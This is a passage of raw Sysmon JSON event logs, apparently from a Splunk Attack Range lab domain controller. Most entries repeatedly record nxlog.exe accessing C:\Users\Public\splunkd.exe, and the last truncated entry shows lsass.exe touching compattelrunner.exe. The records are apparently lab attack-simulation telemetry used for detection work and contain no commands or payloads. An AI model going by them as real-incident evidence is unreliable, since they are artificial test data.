(x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:50:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:50:45","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2939,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:50:45.297\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3580\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:50:45.297","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3580","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:50:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:50:46","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2940,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:50:46.300\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3588\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:50:46.300","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3588","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:50:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:50:47","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2941,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:50:47.302\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3576\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:50:47.302","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3576","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:50:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:50:48","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2942,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:50:48.304\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3588\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:50:48.304","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3588","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:50:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:50:49","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2943,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:50:49.307\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3584\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:50:49.307","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3584","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:50:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:50:50","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2944,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:50:50.309\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3588\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:50:50.309","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3588","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:50:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:50:50","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2945,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:50:50.481\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 988\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-0010546B0100}\r\nTargetProcessId: 2312\r\nTargetImage: C:\\Windows\\system32\\compattelrunner.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: 